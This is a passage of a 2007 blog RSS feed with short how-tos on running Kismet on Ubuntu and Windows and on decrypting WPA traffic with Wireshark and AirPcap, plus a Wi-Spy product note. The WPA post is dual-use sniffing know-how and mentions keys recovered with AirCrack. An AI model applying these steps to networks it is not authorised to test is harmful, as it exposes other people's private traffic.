If you don&#8217;t know your relevant network driver, view the Kismet Readme  and scroll down to the section &#8220;12. Capture Sources&#8221;. My driver is ipw2200.
If you don&#8217;t know [...]]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s how I got Kismet running on Ubuntu on my Asus W3V laptop.<span id="more-64"></span></p>
<ol>
<li>Open up a Terminal: Applications &gt; Accessories &gt; Terminal<code></code></li>
<li><code>sudo apt-get install kismet</code></li>
<li><code>sudo gedit /etc/kismet/kismet.conf</code></li>
<li> Change<code><br />
source=none,none,addme</code><br />
to<br />
<code>source=ipw2200,eth1,wifi</code></p>
<ul>
<li>If you don&#8217;t know your relevant network driver, view the <a href="http://www.kismetwireless.net/documentation.shtml#readme">Kismet Readme</a>  and scroll down to the section &#8220;12. Capture Sources&#8221;. My driver is ipw2200.</li>
<li>If you don&#8217;t know your interface name, use <code>iwconfig</code> to find your wireless interface (mine is eth1). [<a href="http://www.twistedethics.com/wp-content/uploads/2007/04/ubuntu-704-iwconfig.png" title="iwconfig output on Ubuntu 7.04">screenshot</a>]</li>
</ul>
</li>
<li>Save the file</li>
<li><code>sudo kismet</code> [<a href="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-running-on-ubuntu-704.png" title="Kismet running on Ubuntu 7.04">screenshot</a>]</li>
</ol>
<p>Any questions? Feel free to leave me a comment below <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><iframe src="http://rcm-uk.amazon.co.uk/e/cm?t=mincir0e-21&#038;o=2&#038;p=13&#038;l=st1&#038;mode=books-uk&#038;search=ubuntu&#038;nou=1&#038;fc1=000000&#038;lt1=_blank&#038;lc1=3366FF&#038;bg1=FFFFFF&#038;f=ifr" marginwidth="0" marginheight="0" width="468" height="60" border="0" frameborder="0" style="border:none;" scrolling="no"></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/04/25/how-to-setup-kismet-in-ubuntu-704/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Decrypting WPA with AirPcap in Windows</title>
		<link>http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/</link>
		<comments>http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/#comments</comments>
		<pubDate>Sat, 14 Apr 2007 09:58:58 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/</guid>
		<description><![CDATA[When AirPcap was first released, only WEP decryption was supported. However, with the release of Wireshark 0.99.5 it is possible to decrypt WPA packets with the AirPcap adapter in Windows. Here's how...]]></description>
			<content:encoded><![CDATA[<p>A step-by-step guide to decrypting WPA with Wireshark and AirPcap in Windows.<span id="more-57"></span></p>
<p>When AirPcap was first released, only WEP decryption was supported. However, with the release of Wireshark 0.99.5 it is possible to decrypt WPA packets with the <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap adapter</a> in Windows. Here&#8217;s how:</p>
<ol>
<li>Install <a href="http://www.wireshark.org/download.html">Wireshark 0.99.5</a> or above</li>
<li>Run Wireshark</li>
<li>Go: View &gt; Wireless Toolbar</li>
<li>Click on &#8220;Decryption Keys&#8230;&#8221;</li>
<li>Add a new decryption key. In my instance, because I know the Passphrase, I used WPA-PWD. If you&#8217;re doing penetration testing and, you have a 64byte string from something like AirCrack, you should use WPA-PSK.<br />
<a title="2007-04-13_155300.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_155300.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_155300.thumbnail.gif" alt="2007-04-13_155300.gif" /></a></li>
<li>Capture away. In the screenshots below, I&#8217;ve filtered my own Wi-Fi card to cut down on the volume of &#8216;junk&#8217; and demonstrate that it is, in fact, decrypting the packets on the WLAN.<br />
<a title="2007-04-13_160402.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160402.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160402.thumbnail.gif" alt="2007-04-13_160402.gif" /></a> <a title="2007-04-13_160440.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160440.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/2007-04-13_160440.thumbnail.gif" alt="2007-04-13_160440.gif" /></a></li>
</ol>
<p>For a lot more information on getting this set up, check out the <a href="http://www.cacetech.com/support/downloads.htm">AirPcap Userguide</a>.</p>
<p>Did this help you at all? Any questions? Feel free to leave me a comment below!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Kismet on Windows (without a drone)</title>
		<link>http://www.twistedethics.com/2007/04/12/kismet-on-windows-without-a-drone/</link>
		<comments>http://www.twistedethics.com/2007/04/12/kismet-on-windows-without-a-drone/#comments</comments>
		<pubDate>Thu, 12 Apr 2007 18:47:31 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/04/12/kismet-on-windows-without-a-drone/</guid>
		<description><![CDATA[It is possible to get Kismet to run on Windows without using a drone. How? Well first (and this is probably the killer) you need to have an AirPcap USB adapter and then you need to download Kismet for Windows.
What is AirPcap?
If you need to capture 802.11b/g packets in Windows, then AirPcap is your answer. [...]]]></description>
			<content:encoded><![CDATA[<p>It is possible to get Kismet to run on Windows without using a drone. How? Well first (and this is probably the killer) you need to have an <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap USB adapter</a> and then you need to download <a href="http://www.cacetech.com/support/downloads.htm">Kismet for Windows</a>.</p>
<blockquote><p>What is AirPcap?</p>
<p>If you need to capture 802.11b/g packets in Windows, then AirPcap is your answer. Made by the guys who brought you WinPcap and <a href="http://www.wireshark.org/">Wireshark</a>, AirPcap enables you to capture raw Wi-Fi packets in Windows. AirPcap fully integrates into Wireshark, giving you a seamless packet capture experience. <a href="http://www.wireless-analysis.co.uk/#airpcap">Read More AirPcap&#8230;</a></p></blockquote>
<p>Kismet for Windows is available from the <a href="http://www.cacetech.com/support/downloads.htm">CACE Tech website</a>. At present, it only works with AirPcap and Kismet drones.</p>
<p><a title="kismet-windows-airpcap-2007-04-12_193050.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-windows-airpcap-2007-04-12_193050.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-windows-airpcap-2007-04-12_193050.thumbnail.gif" alt="kismet-windows-airpcap-2007-04-12_193050.gif" /></a> <a title="kismet-windows-airpcap-2007-04-12_193245.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-windows-airpcap-2007-04-12_193245.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-windows-airpcap-2007-04-12_193245.thumbnail.gif" alt="kismet-windows-airpcap-2007-04-12_193245.gif" /></a> <a title="kismet-windows-airpcap-2007-04-12_193312.gif" href="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-windows-airpcap-2007-04-12_193312.gif"><img src="http://www.twistedethics.com/wp-content/uploads/2007/04/kismet-windows-airpcap-2007-04-12_193312.thumbnail.gif" alt="kismet-windows-airpcap-2007-04-12_193312.gif" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/04/12/kismet-on-windows-without-a-drone/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Wi-Spy with new external antenna option</title>
		<link>http://www.twistedethics.com/2007/04/02/wi-spy-with-new-external-antenna-option/</link>
		<comments>http://www.twistedethics.com/2007/04/02/wi-spy-with-new-external-antenna-option/#comments</comments>
		<pubDate>Mon, 02 Apr 2007 12:51:29 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[Wi-Fi]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/04/02/wi-spy-with-new-external-antenna-option/</guid>
		<description><![CDATA[The guys over at Metageek are gearing up to release a new version of the well-received Wi-Spy 2.4GHz spectrum analyser, which will include an SMA connector for connecting external antennas.

If you work or play with Wi-Fi networks and you&#8217;ve never heard of Wi-Spy, it&#8217;s worth checking out. Small, and affordable, Wi-Spy is a very capable [...]]]></description>
			<content:encoded><![CDATA[<p>The guys over at Metageek are <a href="http://metageek.net/blog/2007/03/19/FCC-Goodness/">gearing up to release a new version</a> of the well-received Wi-Spy 2.4GHz spectrum analyser, which will include an SMA connector for connecting external antennas.</p>
<p><span id="more-42"></span></p>
<p>If you work or play with Wi-Fi networks and you&#8217;ve never heard of Wi-Spy, it&#8217;s worth checking out. Small, and affordable, Wi-Spy is a very capable wireless spectrum analyser. You just plug in the USB dongle, load up the Chanalyzer software and you&#8217;ll be seeing the 2.4GHz spectrum in no time. It&#8217;s fantastic for wireless troubleshooting (especially when your wireless network seems slow or keeps dropping out) &#8211; enabling you to confidently choose a Wi-Fi channel with less interference, as opposed to the old method of &#8216;blindy&#8217; changing channels and hoping things improve.</p>
<p>You can find out more at my <a href="http://www.wireless-analysis.co.uk/">Wireless Analysis</a> site.</p>
<p>If you already have Wi-Spy, what do you use it for?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/04/02/wi-spy-with-new-external-antenna-option/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

